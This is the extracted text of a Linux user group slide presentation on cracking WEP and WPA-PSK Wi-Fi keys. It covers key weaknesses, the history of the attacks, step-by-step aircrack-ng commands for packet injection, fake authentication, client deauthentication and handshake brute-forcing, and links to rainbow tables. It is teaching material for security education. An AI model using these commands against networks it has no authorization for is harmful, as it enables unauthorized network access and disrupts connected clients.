Cracking Wireless

Ryan Curtin
LUG@GT

Ryan Curtin Cracking Wireless - p. 1

 Goals

Goals
Setting Up
By the end of this presentation (if you stay awake), you will:
Checking Injection

WEP
 Understand the different types of wireless keys as well as
WPA
their advantages and disadvantages
Questions and Comments?
 Understand the legal ramifications of cracking wireless keys
 Have a basic idea of the theory behind the cracking of each
key type
 Know how to use software to crack wireless keys

Ryan Curtin Cracking Wireless - p. 2

 Setting Up

Goals
Setting Up
Most of the work can be done with the aircrack-ng package.
Checking Injection

WEP
None of these attacks can be performed if you are using
WPA
ndiswrapper for your network drivers, or other drivers that do
Questions and Comments?
not support promiscuous (or monitor) mode.
Starting / stopping promiscuous mode:
airmon-ng stop wlan0
airmon-ng check wlan0
airmon-ng start wlan0 <channel>

Ryan Curtin Cracking Wireless - p. 3

 Checking Injection

Goals
Setting Up
Before starting, make sure your card can inject packets into an
Checking Injection AP!
WEP

WPA
aireplay-ng -9 -e <ESSID> -a <MAC> wlan0
Questions and Comments? Make sure the percentage of ping replies is not incredibly
small, otherwise it may be difficult to collect data.

Ryan Curtin Cracking Wireless - p. 4

 WEP Encryption

Goals
Setting Up
The slide title is not redundant! WEP stands for wired
Checking Injection equivalent privacy, not wireless encryption protocol.
WEP
WEP Encryption  64-bit or 128-bit keys
Cracking WEP
Using aircrack-ng
Using aircrack-ng (2)  Uses RC4 stream cipher with CRC-32 checksum
WPA

Questions and Comments?

 Keys have 24-bit IV (initialization vector)

 22 4 (16 million) possible IVs

 50% probability of repeated IV after only 5000 packets

Ryan Curtin Cracking Wireless - p. 5

 Cracking WEP

Goals
Setting Up
Different methods have been developed:
Checking Injection

WEP
 2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a
WEP Encryption passive attack
Cracking WEP
Using aircrack-ng
Using aircrack-ng (2)  2005: FBI demonstrates WEP cracking in three minutes
WPA

Questions and Comments?

 2006: Bittau, Handley, and Lackey show that active attacks
are possible
 2007: Pychine, Tews, and Weinmann optimize active attack
(PTW attack)

Ryan Curtin Cracking Wireless - p. 6

 Using aircrack-ng

Goals
Setting Up
1. Gather important data: access point MAC, ESSID, channel
Checking Injection airodump-ng wlan0
WEP
WEP Encryption
Cracking WEP
2. Start capture of IVs
Using aircrack-ng
Using aircrack-ng (2)
airodump-ng -c <channel> -bssid <MAC> -w
WPA
<outputfile> wlan0
Questions and Comments?
Leave this running! You want to capture around 50k IVs
to ensure success (maybe more)

3. Fake authentication with AP

aireplay-ng -1 0 -e <ESSID> -a <MAC>
wlan0

Ryan Curtin Cracking Wireless - p. 7

 Using aircrack-ng (2)

Goals
Setting Up
Checking Injection
4 Reinject ARP packets to get more IVs
WEP
aireplay-ng -3 -b <MAC> wlan0
WEP Encryption Run until you have a substantial number of IVs (in your
Cracking WEP
Using aircrack-ng airodump-ng process)
Using aircrack-ng (2)

WPA 5 Crack the key!

Questions and Comments? FMS attacks (slow): aircrack-ng -f 1 -F
<capture>.cap
PTW attacks (fast!): aircrack-ng -P 2
<capture>.cap

Ryan Curtin Cracking Wireless - p. 8

 WPA Encryption

Goals
Setting Up
WPA with TKIP appeared as an interim solution to the WEP
Checking Injection problem while 802.11i was prepared; 802.11i is WPA2.
WEP

WPA
 WPA: Wi-Fi Protected Access
WPA Encryption
Cracking WPA-PSK
 TKIP: Temporal Key Integrity Protocol
Using aircrack-ng
Rainbow Tables
 TKIP also uses RC4 cipher (for legacy WEP hardware)
Questions and Comments?
Use AES instead if possible!
 IV length increased to 48 bits
 WPA-PSK (pre-shared key): common consumer
environment setup

Ryan Curtin Cracking Wireless - p. 9

 Cracking WPA-PSK

Goals
Setting Up
The WPA PSK initialization process is reproducible!
Checking Injection

WEP

WPA
WPA Encryption
Therefore, we must capture a WPA handshake and then try to
Cracking WPA-PSK replicate it.
Using aircrack-ng
Rainbow Tables

Questions and Comments?

Ryan Curtin Cracking Wireless - p. 10

 Using aircrack-ng

Goals
Setting Up
1. Gather important data: access point MAC, ESSID, channel;
Checking Injection optional: ESSID of connected client
WEP airodump-ng wlan0
WPA
WPA Encryption
Cracking WPA-PSK
2. Start capture of handshakes
Using aircrack-ng
Rainbow Tables
airodump-ng -c <channel> -bssid <MAC> -w
Questions and Comments?
<outputfile> wlan0
Leave this running! Watch for WPA handshake:
xx:xx:xx:xx:xx:xx

3. (Optional) Fake deauthentication of client to trigger

handshake
aireplay-ng -0 1 -a <AP MAC> -c <client
MAC> wlan0
Watch for successful ACK in program output

4. Brute-force attack saved handshake

aircrack-ng -w <dictionary> -b <MAC>
Ryan Curtin <output capture> Cracking Wireless - p. 11
 Rainbow Tables

Goals
Setting Up
Rainbow Tables: a giant collection of potential common
Checking Injection passphrases
WEP

WPA
Available from:
WPA Encryption
Cracking WPA-PSK  Church of Wifi Rainbow Tables:
Using aircrack-ng
Rainbow Tables http://www.renderlab.net/projects/WPA-tables/
Questions and Comments?
 The Schmoo Group: http://rainbowtables.shmoo.com/
 Google Search:
http://www.google.com/#q=wpa+rainbow+tables

Ryan Curtin Cracking Wireless - p. 12

 Questions and Comments?

Goals
Setting Up
Checking Injection

WEP

WPA

Questions and Comments?

Questions and Comments?

Ryan Curtin Cracking Wireless - p. 13